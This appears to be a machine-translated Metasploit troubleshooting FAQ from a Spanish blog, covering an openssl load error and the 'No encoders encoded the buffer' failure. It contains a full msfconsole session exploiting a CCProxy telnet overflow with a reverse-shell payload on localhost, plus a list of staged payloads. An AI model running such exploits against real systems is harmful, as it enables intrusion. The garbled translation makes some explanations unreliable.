Metasploit FAQs

Metasploit / FAQ Metasploit Contents | FAQ’s InstalaciónEditar Errors no such file to load – openssl (LoadError) Q: When I run Metasploit for the first time, I get the error: no such file to load – openssl (LoadError) Example: [~ / Metasploit] #. / Msfgui . / Lib / rex / socket / ssl_tcp_server.rb: 4: in `require ‘: no ​​such file to load – openssl (LoadError) from. / lib / rex / socket / ssl_tcp_server.rb 4 from. / lib / rex / socket / comm / local.rb: 5: in `require ‘ from. / lib / rex / socket / comm / local.rb: 5 from. / lib / rex / socket.rb: 22: in `require ‘ from. / lib / rex / socket.rb: 22 from. / lib / rex.rb: 71: in `require ‘ from. / lib / rex.rb: 71 from. / msfgui: 10: in `require ‘ from. / msfgui 10 R: Metasploit Ruby implementation requires openssl – not standard C implementation of openssl used by Apache etc. Install the necessary library ruby-openssl. Example (for Debian – check your SO or try using gem): pwebster @ metasploit: ~ $ apt-cache search ruby ​​| grep openssl libopenssl-ruby – OpenSSL interface for Ruby libopenssl-ruby1.8 – OpenSSL interface for Ruby 1.8 libopenssl-ruby1.9 – OpenSSL interface for Ruby 1.9 pwebster @ metasploit: ~ # apt-get install libopenssl-ruby Modules ExploitEditar Errors Exploit failed: No encoders encoded the buffer successfully Q: After setting all the parameters required for an exploit module and run exploit, recivo the following error: [-] Exploit failed: No encoders encoded the buffer successfully. Example: msf> use windows / proxy / ccproxy_telnet_ping msf exploit (ccproxy_telnet_ping)> info Name: CCProxy <= v6.2 Telnet Proxy Ping Overflow Version: $ Revision $ Platform: Windows Privileged: No License: Metasploit Framework License Provided by: Patrick Webster Available targets: Id Name —— 0 Windows 2000 Pro SP0 – Inglés 1 Windows 2000 Pro SP1 – Inglés 2 Windows 2000 Pro SP2 – Inglés 3 Windows 2000 Pro SP3 – Inglés 4 Windows 2000 Pro SP4 – Inglés 5 Windows XP SP0 / 1 – Inglés 6 Windows 2003 Server SP0 / 1 – Inglés Basic options: Name Current Setting Required Description ————————————– Rhost 127.0.0.1 yes The target address RPORT 23 yes The target port Payload information: Space: 200 Avoid: 5 characters Description: This module exploits the YoungZSoft CCProxy set TARGET 4 TARGET => 4 msf exploit (ccproxy_telnet_ping)> set PAYLOAD windows / shell_reverse_tcp PAYLOAD => windows / shell_reverse_tcp msf exploit (ccproxy_telnet_ping)> set LHOST 127.0.0.1 LHOST => 127.0.0.1 msf exploit (ccproxy_telnet_ping)> check [*] The target appears to be vulnerable. msf exploit (ccproxy_telnet_ping)> exploit [-] Exploit failed: No encoders encoded the buffer successfully. A: The payloads available (show payloads) are determined by the available memory space (‘Space’) for the exploit to use. In the example, the space for the payload is: ‘Space: 200’. However, the target application does not allow certain characters to be used (usually the null character 0x00 as it marks the end of a string [character array]). In the example, the payload does not allow five characters: ‘Avoid: 5 characters’ When you run the exploit, the payload generator tried to put the payload in a space of 200, excluding five specific characters. This is not always possible, and will result in the error: No encoders encoded the buffer successfully. However, all is not lost. Metasploit Framework includes the ability to support an organized payloads. A hosted payload is a significantly smaller payload, instead of executing the desired action (such as reverse shell), start organizing platform that can then be added to that platform. Then, in our example, instead of a complete shell reverse, it will also: Create the platform to organize. Allocate enough memory to hold the desired payload. Get the rest of the payload from you. Executing the payload overall. Generally, all organized exploit are denoted by ‘/’ after the desired payload. Some examples are: windows / dllinject / reverse_tcp Windows Inject DLL, Reverse TCP Stager windows / download_exec / bind_tcp Windows Executable Download and Execute, Bind TCP Stager windows / exec / find_tag ​​Windows Execute Command, Find Tag Ordinal Stager windows / meterpreter / reverse_tcp Windows Meterpreter, Reverse TCP Stager windows / shell / reverse_tcp Windows Command Shell, Reverse TCP Stager windows / upexec / bind_tcp Windows Upload / Execute, Bind TCP Stager windows / vncinject / reverse_ord_tcp Windows VNC Inject, Reverse Ordinal TCP Stager Now that we know that can not always run a payload ‘Unabridged’, we can use one organized in such cases: … msf exploit (ccproxy_telnet_ping)> exploit [-] Exploit failed: No encoders encoded the buffer successfully. msf exploit (ccproxy_telnet_ping)> set PAYLOAD windows / shell / reverse_tcp PAYLOAD => windows / shell / reverse_tcp msf exploit (ccproxy_telnet_ping)> exploit [*] Started reverse handler [*] Trying target Windows 2000 Pro SP4 – Inglés on host 127.0.0.1:23 … [*] Sending stage (474 ​​bytes) [*] Command shell session 8 opened (127.0.0.1:4444 -> 127.0.0.1:2016) Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C: \ Documents and Settings \ Administrator>

Anuncios

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s